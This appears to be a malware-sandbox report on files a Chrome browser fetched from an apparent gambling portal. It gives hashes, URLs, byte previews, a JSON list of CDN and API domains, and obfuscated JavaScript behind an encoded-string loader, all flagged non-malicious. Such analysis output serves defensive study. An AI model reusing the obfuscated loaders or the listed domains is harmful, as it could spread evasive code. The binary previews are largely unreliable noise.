                                                                                                                                                          Preview:<!DOCTYPE html>..<html xmlns="http://www.w3.org/1999/xhtml">..<head>....<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />..<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0">..<title>.........-....... </title>..<meta name="keywords" content="........."/>..<meta name="description" content=".........-.......................BBIN...MG.....BET365...................................:www.512net,www.203626com,www.59533com,www.6613com,.........-.......,2015.....,.........-......................."/>....</head>..<body>..<script language="javascript" type="text/javascript" src="/jquery.min.js"></script>..</body>..</html>.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 334 x 81, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):13472
                                                                                                                                                          Entropy (8bit):7.969583646222461
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:hSHIIHUCD4wajBOMymGZqYREmEA7ULOnQXP2rAd8D68WdeRMC/4aMV4JaLiMTH90:I50wRMduR5R2eJ6WGg4bV4WiM7Aa4
                                                                                                                                                          MD5:C1B662429565930C6FF3BA1B9EFD3371
                                                                                                                                                          SHA1:7406ED629DDF60826982C89782D244B557BC7C26
                                                                                                                                                          SHA-256:ED2450629CB22C9B3184446C3617E98D036D3FAAAB978C42B1023B42CD6F9C64
                                                                                                                                                          SHA-512:EEC443C4D7F0385C0147FF0ACAEC7548A0E6943A2A59933EE7C9F8EFC7E4E3EECE4D1EBFF701443B1730C51FACAA5E12043574F25CC42EF124FA37DD2554FCA5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...N...Q.....2.......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2193
                                                                                                                                                          Entropy (8bit):7.504164108906097
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:7ANn2N0J3vFP8/aikV1duaZiYMp0RsfvzSpjguvo1+709:c2UFPiZkV1duaZiYMp0yfvzbuA1J9
                                                                                                                                                          MD5:DB31E0B3F00CDF4D73572B716704F358
                                                                                                                                                          SHA1:D36AC069005C0D496FE8F1E951288A3788FBDFD6
                                                                                                                                                          SHA-256:49D0739165F2823B186324D2A3D0ED719A66740EAD4E9DA7B8A4C720D7079881
                                                                                                                                                          SHA-512:80A31CA23DDDA5A1F4CE75A04D2700F28B9AD814087E6AB1E82D2E3C16B840F78346DD0E283578C969D35C078E361CF09457178E527D896C5073884CE8BE8E2D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/card_nwg.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:F0690D77E8B411E8AA3D8F69252F8195" xmpMM:DocumentID="xmp.did:F0690D78E8B411E8AA3D8F69252F8195"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F0690D75E8B411E8AA3D8F69252F8195" stRef:documentID="xmp.did:F0690D76E8B411E8AA3D8F69252F8195"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>D8......IDATx..V.o.E.?sf..~..........H.....6D.1.......L|1.`...Mx...F.y .....1....F..*R.......{..........h..o.gf
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (4220), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4220
                                                                                                                                                          Entropy (8bit):5.890301053962297
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:Vj3lbeS+avFJ6foj9PkT4MkK++CYpTJrTSRcWXu+QamK:Vj3lb9+avFMoBPkTjCS5eRR++9mK
                                                                                                                                                          MD5:4223A5E6D607E1A264A6D6B0F0ED30F9
                                                                                                                                                          SHA1:6397870109BCCC24AA6DF310AFC361A80F6C4CEE
                                                                                                                                                          SHA-256:56E3177FC6111CA54DB41B5F60CFB42E4EBF219458A2E015ACCCB95DD559EAD9
                                                                                                                                                          SHA-512:B04F0D9D023E05FE819A8D9C1220AA411C3AE573F99DB3578EB5E9F557EC27B924FD152359EAA97C276AD3CA527FF253D267AB2F5C6B568A66971012309CBF61
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/383/footerNav.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHAVgHYBdAGgG8AiAWQHoIBbSgLgDMBXNGAFwEt1MSUtwCU5AL6kAGnADKstpx780g4aShjK7JCAAESbgCdePSgG4A8mABWIHgDoAJiFa80IAApGUEEEe4AT0xuUkoAfXCQJGoUJ3YAGxBKCgA3KAT2EGYAQgAGcRFzdKM9dgBeKExKPJgIVkoRUlTy8icobihFLj4BMSMQbnYjNHI0KFTmbDIYJzRPDoALZnZnVyhE7gcAYXRDKDQt2bQACRRDUh92bn9mSndWFCMGDpUAfkpxSQZBxbikZgSUgwAYdEBObrKPrkEoGcrcRa8ITccrAdxOFDAByyADSAEkAHLmKqUVIAc0Wlka1QctEoAGpuPTKLQkOwwASJg4bEhGg4ESBVBweipMOwxLCWqsfmh2AAZJHcYnVACMAEEbGTqZRaQymSz0SAAB7c3kifmLQWYYVQ1SiGFQUpQeEOcapcxIBwAEg8Ru4ABVTHBrUpeqoxJ63ZUHC8sDaw4J+oNhmgDA4EoqY1A46HRUgIw5oAiAGTFlmUHLlT1FxYONlgQxGTB5UgqkSlwQORZQJCWYDzHx+ALBSjjH6NUuUCtV11QH4AH3nnbHIHKqWw1aWxAcMEWTU3CPKLKcMDevCcR/pB73hVISEKD5ED9IDBQnBuEPjorEX1IYFaAxoC4RiQgmEqOnCCJIsIM5eiCIBggAokkMqhM6nrhLoCSsA44QwIuSoDEMIx6CSTi8KkKTkPsfAwNsCQ9gClCPCgNxGAAtG6nykNgKrlPxkZckkaBkgibwbrhCTLhMpBfgI9pESmEnhFJWwZhccl2kmxFoNgWw1m8JJXGx7EZmgcBUTADFIACRwMQAXvZGjcMYALkNwKDMPpSy/spqTVAAOmgAXcCFYWhdwDIYUgISzj8IjMkF4XhY0xAiMwJJQJZ1m2TuDlOR0rmAosAysF5XalYulA2BMPYgrwED
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 18388
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4084
                                                                                                                                                          Entropy (8bit):7.94569233466241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:mwcWOzIzqP0Drv6oQckG8NF/xiWqpvCkxpR:RwIzXscRqRxiWkTpR
                                                                                                                                                          MD5:106BA6DD5A7918BDB0DD73A4594C5684
                                                                                                                                                          SHA1:5DA4B04A3D47B087CDC723C63606CCD53D61C52F
                                                                                                                                                          SHA-256:4BE1B19DD11804094ACA2A4C9E62C22AFD21B14EAFFCA0874E87A3441BE04966
                                                                                                                                                          SHA-512:1B1589144CCB52B8F53C0D6862E626808F70748B3F4E3DCB950F985A8C2200E7CE7FAD056AC6645FAD84063178DC517FAAAC7ADC2EF18BA20D19666C8CA3833E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/ocs/zbw?r=7046188405
                                                                                                                                                          Preview:...........WKo.6.>o~E.^c.....E.=t...........E.....z.R..zk` ...7.of......J..=..*E.r].=t..(..R..o.b.m.%.N.....&=|8.C/.I ....N.....P......_.o....7._P..N...=........=......$..*..jc...^..........._.>....f..s...u).}".H......t}:].YO^+.C..K?=....p.CD=._......%.{.Y'Y(.4..'..K...aV..]!6....Y!.*.e.EY.K./(.-h.t.._.\.f....C..=..K.~rV6......i..h.x~.{2U.G.....T..n..j.~.^:........s..U`N]}j1.T%....)7.u.6G..y8.....@.H..zz|...y"...DZTJ.}.'d.I......eQ.~..X*..Q.>.NO...avi......gA.V.O.\...O...."K<..%........,....w.V&...gA.k..L.K....!3....y..Y.WG...d;l0...go_.HxU.......b.|..(.f^.JE....=w<..i...q~%.<..G}.r..3..U.e)..;...DX.-.r.g.3....aKB.I..Xhy.R.b......W.......K....:p......y8.a...%`..n..E`e..JyA..R`lwK...........,....u=.l..>f. .~....._....z...7.Nwow..s..S..s....,..m....{+<h.....v/.'.%a...dd....Z.Pq..0.`~Cg.wx:.".-@0.I>..a.S.A.PLL.s.....309......)..:......s.X.D....w#h.[m.m.y....0.% .Iv.a+..D.. ..N....S../.BM..........gd..2.s.5..v..lg.c.;.....v..`...;.1_..C...2..0
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2193
                                                                                                                                                          Entropy (8bit):7.504164108906097
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:7ANn2N0J3vFP8/aikV1duaZiYMp0RsfvzSpjguvo1+709:c2UFPiZkV1duaZiYMp0yfvzbuA1J9
                                                                                                                                                          MD5:DB31E0B3F00CDF4D73572B716704F358
                                                                                                                                                          SHA1:D36AC069005C0D496FE8F1E951288A3788FBDFD6
                                                                                                                                                          SHA-256:49D0739165F2823B186324D2A3D0ED719A66740EAD4E9DA7B8A4C720D7079881
                                                                                                                                                          SHA-512:80A31CA23DDDA5A1F4CE75A04D2700F28B9AD814087E6AB1E82D2E3C16B840F78346DD0E283578C969D35C078E361CF09457178E527D896C5073884CE8BE8E2D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/card_nwg.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:F0690D77E8B411E8AA3D8F69252F8195" xmpMM:DocumentID="xmp.did:F0690D78E8B411E8AA3D8F69252F8195"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F0690D75E8B411E8AA3D8F69252F8195" stRef:documentID="xmp.did:F0690D76E8B411E8AA3D8F69252F8195"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>D8......IDATx..V.o.E.?sf..~..........H.....6D.1.......L|1.`...Mx...F.y .....1....F..*R.......{..........h..o.gf
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2872), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2872
                                                                                                                                                          Entropy (8bit):5.900960373914136
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:V9I8JDNlbWq8xNow1AXouMQGzapVLsf2/pjUf3p9wF+h9/O8qFHJvMx3vBRmZgk:V+81WqkN31IoCGzap2+/lghL/BMuk
                                                                                                                                                          MD5:E0916CD347EE731003BCA1D6B1C0E153
                                                                                                                                                          SHA1:A1FC25AB7E134BC687C91F37C444F4F518CC8DB6
                                                                                                                                                          SHA-256:DE12165187C15B55C210815D7A897379595015D79A9142937F226B93A36DF2DE
                                                                                                                                                          SHA-512:FC3086691ACA39F0A2FCC4948EF5E94C0687B3880BE0B7FEFE753AB32D6278E325349B6DBAD73DC14DAA4E4B426E27A7D8039B90FB72A5101427B2B957F46009
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/125/headerTip.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHLgNgF0AaAbwCU4BFAeQC4AzAVzRgBcBLdTdkkEpwCUZAETMkIAARJ2AJ04dRAblpgAViA4A6ACYhGnNCAAKclBBBz2AT0wDRAfUcgkAWRS7mAGxCjyAG5Q3swg9ACEAAwAvkLKQXIyALycmKKRMBCMokIkaElkaFAAtmGiXBBIADKcsv66UOxQTKwc3GiYInIg7MxyaGQwumgmjQAW9Eh6BlA+7NoAwuiyUGjzQ2gAEiiygsUA5gCqFFWT04yz3vNLaCtr2hvbsgDUogD0nMVQ+yAAtBAwN4odhjKxvUTPYBGXQoYDaADKAGkAJIAOVe4JIFWqtXY9DI0Sxnys9DQPm8JEO8IAolxSvRRP5PvsAEJQST0bCibyrfaOCAAL38okYPP2olIMBQrHYJMiJClMqsABViXJSeTooTSiDPEh8czRiCWmwuDw+CAuj0+mhRGN2OwIKIki75khmGBZHJMPKACxCAD8eJBtQewyNYwxn2+fwB4OeIamzLZkmwICIGIh7EJknYSyV6pYpvavH4IgSUk4STc420opQKG9voAjAAqGsg7RyVYw4qdITPX4AJkiykTD2laysSXHiqncmenCxY1Dc9lcgAfOwAGTb3grqZr6fsXKzyfrgA8IF3+9X5+nlq1JGK990JraPBEhJg3UaIDfRYfh05ZQIk7Azge/BJFCaAwnCSJosoqSiM2ACC6jikIaTaPGIBRrBIAAB7aOoSA5NoIIgB0gFmh0lpkPMAAkxiEewqrwJgNEliI8zYjUshJCA2iglA+hyBRnCVPx7DxKBlYzhJUm4nWnBXFYnGtLRpb0d0vT9OUxLOq6FE2JYsR5Ek2BEGOik4rIdaNtSsBjBpxbmiIBmlKI4TGbYli7vM3i4sisrFDe+SBcFoUqWp3pce5ZC6TaUjrDyAoCgpMBpQKAA+OWMiQvzNj5SSONo0JEbQjC8A82XaEgEBB
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18388
                                                                                                                                                          Entropy (8bit):4.351571195978757
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:sPrmmNeqmORafrtTThDeJ+GgJttHVENDYXdk0hfbwSr:0rmFORstThDeJtgJtFVENMXdkMBr
                                                                                                                                                          MD5:AB2CBE8957927CF9923F1435AA517BC8
                                                                                                                                                          SHA1:C1F5439091C7914EE2E65D8E9E4DC31A17327AEC
                                                                                                                                                          SHA-256:36BFC70E4B7D8EE7D2C3687C8F704AE2021A8F1F61FF31AD71C6227C602391D7
                                                                                                                                                          SHA-512:9A51747CC8D842CDF60CD433964529A5CBDD02E83D2972D8059B5935F7EF912757FF4461E757B5F662195F22A86B65F7969151BF9DAA303B5F55FF483C6C6266
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:{. "nnn": "outer-888",. "versions": {. "zb_m": "240606-01",. "zb_pc_member": "240529-01". },. "http": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1585","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1985"]. },. "https": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1586","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1986"]. },. "public_domain": ["cppublbyv2-ali.epie3d.com", "cppublbyv2-hw.zjbxxy.com", "cppublbyv2-ty.huliancc.com"],. "gb_app_ins_domains": ["appiso-ty.souzhanzx.com:1066", "appiso-ty.zvbzjsb.com:8066"],. "gb_plist_api_domains": ["qpplist.lcyj888.com"],. "gb_wx_proxy": "https://wy-ali.meriksenrusso.com",. "gb_disabled_proxy": true,. "gb_is_pc_sp
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (7916), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7916
                                                                                                                                                          Entropy (8bit):5.94866360021918
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:V/llC3QTP45KveRwh2pkhcfCibrr5p4kRHKO1Z06cTCxg:V/llC35sfh2pk2Ks/5RDZzct
                                                                                                                                                          MD5:97754F350182CFC8C44DA49B571B58AE
                                                                                                                                                          SHA1:DB512638EF28AEA9CE94D97C8109C295AB0F61A6
                                                                                                                                                          SHA-256:09875B0E31537955FF250A67BE7A6F5F1843EFF413637CBBE4219224F7847DE8
                                                                                                                                                          SHA-512:C73DDD618E9C805F580C2F89D82977A27CD405FA003719FE493D3C24EABC0F75BAF68E34ECDF2D77B31877D336597D393C7280C0C73B1CF5B0E2E4C70667F62A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/382/login.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAFgA4BdAGgG8AiAVgFUAvAekoC4AzAVzRgBcBLdJhCkepNAEoqHJCAAESHgCc+vSgG4A8mABWIXgDoAJiDZ80IAAqKUEEIp4BPTKMoB9VyCQBZFIY4AbEEoKADcofw4QFgBCAAYAX3E1MMVZKABeNExKABFDQmBKcVIUTP0sqGK+TOzYmAg2ItJFGsoAOQBNAA8NJqR0zBRMcUxyeNItXV5MRX0AWygIAHEQHh47JBHsSj4kABkUAHMzYJ2kABVFBwt/KAdTmUUQlRBaRX9T/yOzAElDU7A4Sg3CCpEoXEUICghjaKH4MFBlCQaAAyqt+GhDqcABZQJC0NCQ6FeKB8D7EYrkQxQHhQADSIAc7C4vAEWUkkJ4HEUaFkPGxu30cEZAGoSfz9IpgYYUHNhvFEiVhqNxpM9DwZvNFl4OLT+OhNqMZDwAMKLHgwXE/NBsFAsSgogCi51cJoAghZziaABJu1w/NoAMV6ivIh1WbRAwD2ZiinG4+qyIA5q25vNc+hAaEMSAA6nx+UJ9DBbvR6GDzNHY0VxrSwGZjF1mQm2UJJCk+elttI7H9TtAkEhgChFP8wTBzZaoCbfEFiGpOWmALQARmi6XSPH0DZAPTYbYA/Fud3u2yKV/bKONwzxLtdbg4AEI8NDN1mCZPkRc86L8wW7O8bjuAAfYDV3XLtKC+Q4NF1U4e0UNooDmRFYBgFAuB4ShiG3bNdw0fdk3GAsQDmc4UBNUt6DfRMhBESRbUUTAOzQLsyAyWI1CgAAeEB9ECTF+S4kURXENB9AgaRsUwRhsDdJcAC1iEYfR1gUIRsCgCkD2cA83FYSglyKEUQE0nCeBQA5QEUM0ZGGFhTK0pJv15Hg9MfAMclcSgRXE7QUDMbIilUlBaAgWwbLxEB7L8gKskoGtSBIsiUEfBsaNbT8Ox4SCwBfA5jjQAEX0DEcb2KtAACUQGOBQ7Aqu8
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):13569
                                                                                                                                                          Entropy (8bit):7.9542641928161375
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:wd2YWEpHwmCOHVTe0wschjx0NQgy3cWShvmHA:wdNF9BCOHVTeDRx0egysXvmg
                                                                                                                                                          MD5:61328DC3D6BBA41D86D4852CDBD80A06
                                                                                                                                                          SHA1:D9FD0CAEDF4CE0B4FD097AEFB3B08FE320F53458
                                                                                                                                                          SHA-256:01160ABD9D13162B1C0E91A286A4A6B3DB263DBFBC96F4A708965DA78C03C471
                                                                                                                                                          SHA-512:ADE51B73B14B4F58240347F36C241418B935E922276ECD1AC059B15FBA73E5CA7A4AB71B9C36DC90A9AADEC46E72AC0E718A770809D3ABB76554D7CA59ADA348
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/pt_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:C17C32078D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:C17C32068D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3886
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1700
                                                                                                                                                          Entropy (8bit):7.8866334761266135
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:XBxsbMMWogVUyG3Jrp8jqCrF1/61BLW6/6UF:fsbMMWogVfG31p41/UW6L
                                                                                                                                                          MD5:DDD547D87965C5ACEB45C17C1E52D913
                                                                                                                                                          SHA1:F277900D7CBB53A47A0898323A50F04EBA3E71FA
                                                                                                                                                          SHA-256:C85CD4247F1C40BF3E86A872E1DD96B569E4EB5D3E5254262637F0D5C99615BA
                                                                                                                                                          SHA-512:BC2462979B58DE9EA471E5EA9FC763034074D94FD61D3E6BA0324A7034F8E4791AD1F265BF7B1C75A981CC534F780FE4EF292321C3D4AE4B508A98B3C1197E1B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:..........|WAo.6...W..$.<[......$@.$u.g.V..%....TH*....P.(0`;.ko.V`...Y.._.$..& .L......}.~. ..$....;;N...YF.I.]G..n..V.n.v.E.%6Z.Z...[.....[..m..*..2.....ot.LD...S........8...c$.~...z..n...f..1...)......3.......`/y... B\`...O.>..._..\.")S.......N..%A..%...}7f(..BX..".I....B..r.........fc='4d9 ...G..&.NR..o_...>9...s.q}...Ce..(..`.......n....rg..-.t.N..D.t.B.{m..............KQ[...S..MwFb....l.nw=..C..z...I..B.h..Q...4=B...b4.K_3.........g..9..*;.+G<<......._j.....w,%.s..rD".....m;2"<."..#*f.?....1.F..........k....RTrv<..).......s......b9*..).U./BX8.!~.?.,$.).Q.Q^.......<.|QL .3.% .JF.......b.k..Jc..@...vEB.&...dj...z.N....u...U`br.....q..zM..>]...).....+..n....c.J...C.OP.'.....y.*.)..k!.c....v.XJ....2...P.........l.hL./..1N.)....U.s8...".,.h..i.c.p..U5J..l..!.Y..d...*d&B..*.k.......lVd.`x.M....].#..1......1 ..r,N.D....2.[.?*.S<W.W i1..%=.X....s...!}..D.b~F...c...?..vJ.]D....Zn...zN...9d...YN.N.. %+...a."kehf.x..^U,..._js.....0..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 4433
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1421
                                                                                                                                                          Entropy (8bit):7.871345807581825
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:XZ+aoBy+/ERT8toLO4KwppHbAZr3fu+6oyMyDuau6husLCMAws7zG:XAx/IcIOTwHbAZrvu3FpuaLAlK
                                                                                                                                                          MD5:1E4E9F51375B084A5459F174B6749B60
                                                                                                                                                          SHA1:CF92E8319B5AFD4AAC588DE5073C7D5D470A1AA7
                                                                                                                                                          SHA-256:71D123AC7AF06A251719002717D0B2806F7E1C43450E559196B517C308110A19
                                                                                                                                                          SHA-512:D87F3C0B58F9841622E4364BD6CDA3256EDE9A918F42853632BA3C1AB9F9A702241920D033C16F8558A2B1F11EE68D915730DCC1E110BD28630FFBFB4BECD841
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/js/jquery/jquery.super-marquee.js
                                                                                                                                                          Preview:............mO.F..0+.|.a.N.b..u.Hc.k.~@.9..\...>C;..}.;80.."..s.....".,...&..?.Ye...gI}.RJ,FY.O...>.CC&!..i..].....]'m..l.......5!M.o.+...;......I.2..W.....).g.Z.~tww,...xy..7.]o....ni..u.ayV.. |f.X....*..._....kE..U.f...4B........^.]<t<.f..........k.N3.....8.T;....J."...7.h$$....\\.S.n.d.N...?@.;.q....M.K..=.V/..=<..?...w.9..m..b.V.`.O7m..N*I.3/4.....Y...{....(..~..x.j.l*-^../.3P.-$.....a.6..M%.....h.....,...[..S........l.......L.>..UA....x..Z...t.#...m.......J.>B......D6...i....`..d.h}Q........nxRs..\.B/g..M...Z.1\1.+E.[0.7H.A...TmX..br.0.....d.......1$(......'...........h.d.......cT..q.......h:..Lb)....D...K.b.r......n..].4..`[.Y..P..K|u~K..+..6Y...x.9M.....6.}.....H.5.].e....#F.L.{p....[M|.........%.....y2.HA..D...N....7#.cr+Q..a...[^.N..?..Hm.W.......=.EC.A.....U..w.HQ<....M.F.K..>\...1~.*.xOU.P^..r.:34.=1W=I^/.....7h..hV..+......~.<x..m...q8G..i..u"h..<..0.t\EX.:g..)e.O.....].d..W...'..5>..k...f..B%o...v.&.H.....y.q.4Uq]..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):13380
                                                                                                                                                          Entropy (8bit):7.947193700012093
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:OMiNuMZ9aSfgV7ED4zQMjlg3k0ZNNf1iEtlUwizoJDj0wUSgBjDF1/W8Z7Wspv4S:OcO9aSo7E05z0ZNNfQE1BtsjGvspAS
                                                                                                                                                          MD5:5357E4239740BA9EC45D841B12D855FE
                                                                                                                                                          SHA1:7AD3F29D694D88A132DD04A972525E751D286279
                                                                                                                                                          SHA-256:62CDE00BFB7F2FC78CDDCEF1F756F1BF6B41938135FFFC2A983C4EF195A5290A
                                                                                                                                                          SHA-512:21963FFDC270538053958756B2CB00F56B325DF2AE36C23B913CCF4F1E81F8CF9A71E0EE102640DB0227611BE98F48645891B3F6222B28BCB7B9D040718B097B
